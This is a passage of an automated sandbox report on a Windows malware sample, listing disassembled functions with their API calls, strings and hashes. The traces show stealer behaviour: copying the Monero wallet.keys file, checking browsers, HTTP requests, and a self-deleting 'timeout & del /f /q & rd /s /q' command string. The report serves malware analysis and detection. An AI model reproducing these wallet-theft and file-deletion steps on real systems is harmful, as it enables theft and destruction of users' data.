                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                            • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                            • API String ID: 2823247455-1079830800
                                                                                                                                                                                                                            • Opcode ID: b071fe12343d58bb0d83dfd60e1d5a4a704574d150c09f98c2c8033b4a0eafb8
                                                                                                                                                                                                                            • Instruction ID: 1ecdbca486f6516b97744b8f32921e2a4b1c5f3f6236c6652c3ebe6830b2fc87
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b071fe12343d58bb0d83dfd60e1d5a4a704574d150c09f98c2c8033b4a0eafb8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B51CAB1E4022A9BCB11EF25DD85ADDB37CAB44708F4140EAA70873152CA786FC68F58
                                                                                                                                                                                                                            Function 00410977 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109AA
                                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004109EA
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A3F
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A46
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410A7C
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,00436E44), ref: 00410A8B
                                                                                                                                                                                                                              • Part of subcall function 00411659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00411674
                                                                                                                                                                                                                              • Part of subcall function 00411659: _memset.LIBCMT ref: 004116A3
                                                                                                                                                                                                                              • Part of subcall function 00411659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116CB
                                                                                                                                                                                                                              • Part of subcall function 00411659: lstrcatA.KERNEL32(?,00436ED4,?,?,?,?,?), ref: 004116E8
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00410AA2
                                                                                                                                                                                                                              • Part of subcall function 004123AA: malloc.MSVCRT ref: 004123AF
                                                                                                                                                                                                                              • Part of subcall function 004123AA: strncpy.MSVCRT ref: 004123C0
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AC5
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                            • String ID: :\$C$QuBi$bwA
                                                                                                                                                                                                                            • API String ID: 1856320939-1665024704
                                                                                                                                                                                                                            • Opcode ID: 10eca5ba7591b1c9726683b6efb2efe54b45c38386d2ee730406ab5f7d6ba462
                                                                                                                                                                                                                            • Instruction ID: b9c2e458b62d39f60936fb5c5f3cecbb2f8bdcade59f27643c81c3961379b96e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10eca5ba7591b1c9726683b6efb2efe54b45c38386d2ee730406ab5f7d6ba462
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0441AFB1A042289BCB259F359D85ADEBBBDEF09304F0000EAF549E3121D6748FC58F68
                                                                                                                                                                                                                            Function 00416908 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                              • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041695C
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00416967
                                                                                                                                                                                                                              • Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,?), ref: 0041697C
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0041698B
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 004169A4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                            • API String ID: 4174444224-1526165396
                                                                                                                                                                                                                            • Opcode ID: 1ef060e16aa293cdc7d669a91b577f2a7f92320b6147e55223d984de7ac28f78
                                                                                                                                                                                                                            • Instruction ID: 4712dda684cdb8c2e2171393cba04d1fb179912ddf7bf229b407c8c660ac4956
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ef060e16aa293cdc7d669a91b577f2a7f92320b6147e55223d984de7ac28f78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1621B6B1910215ABCB10BF35DC469DE7BA9AF04304F11502BF905E3192DB7DDA858B9D
                                                                                                                                                                                                                            Function 0040EA91 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EACE
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB2B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EDF2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC08
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECB8
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED15
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                                            • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                            • API String ID: 3722407311-2697854757
                                                                                                                                                                                                                            • Opcode ID: f2a46934acf5d197ac3ba24e214e728af1aaf9f2852ebb6af8c277c23bb41c48
                                                                                                                                                                                                                            • Instruction ID: 47194a26f9b8e0096c1e3e694baa9a640fb112bc8662c66d582230df9716c17b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2a46934acf5d197ac3ba24e214e728af1aaf9f2852ebb6af8c277c23bb41c48
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AB1A032E00109ABCF20FFAADD47B8D7771AF40314F554126FD04B7291DA78AA998BD9
                                                                                                                                                                                                                            Function 004052FF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101networkfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$CloseHandleHttp$Request$FileInfoOpenOptionQueryReadSend
                                                                                                                                                                                                                            • String ID: GET
                                                                                                                                                                                                                            • API String ID: 2558249038-1805413626
                                                                                                                                                                                                                            • Opcode ID: 632edca03fab61acc8589b3240ddeb41ca39c09e9b0f6479f3d81475db8c834b
                                                                                                                                                                                                                            • Instruction ID: eb7df55b02a43638787ffbf0181485d754e4229e0423021ba31686d85308d6c6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 632edca03fab61acc8589b3240ddeb41ca39c09e9b0f6479f3d81475db8c834b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA4105759009289FDF249F50DD85BEFBBB9EF08306F0011E6E909A22A0DA755FC18F55
                                                                                                                                                                                                                            Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00401ADC
                                                                                                                                                                                                                              • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                                                                              • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                                                                              • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                                                                              • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                                                                              • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                            • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                            • API String ID: 615783205-3586502688
                                                                                                                                                                                                                            • Opcode ID: 87c923612c89c0a7c1b2bcbbf18e619cf5408806aee1e9d578336ebb433b6e5c
                                                                                                                                                                                                                            • Instruction ID: 6f92dde0959b71e6213efb4dedd1dcdc38b1d1e79667daa33b59108eaaa6e09e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87c923612c89c0a7c1b2bcbbf18e619cf5408806aee1e9d578336ebb433b6e5c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0510AB1E4012D9BCB21EB25DD466DD7779AF04308F4050BAA608B3192DA78AFC98F48
                                                                                                                                                                                                                            Function 0040FB02 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB27
                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB53
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040FB96
                                                                                                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FCEC
                                                                                                                                                                                                                              • Part of subcall function 0040F005: _memmove.LIBCMT ref: 0040F01F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                                                            • String ID: N0ZWFt
                                                                                                                                                                                                                            • API String ID: 2647191932-431618156
                                                                                                                                                                                                                            • Opcode ID: 898c51137a7cc0ead4e363bda5b9ea1602847eab9fbb75ffd378713a9d89c653
                                                                                                                                                                                                                            • Instruction ID: 20d42e2015e456c1747424349194f0c6a0577cf11073bf2f021c8e6848fe4d5e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 898c51137a7cc0ead4e363bda5b9ea1602847eab9fbb75ffd378713a9d89c653
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B75182B1D0022C9BDB309F14DC85AEDB7B9AB44304F0001FAA609B7592DB796E88CF59
                                                                                                                                                                                                                            Function 004156AF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registrystringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004156E4
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 00415704
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 0041572A
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00415736
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415765
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415778
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
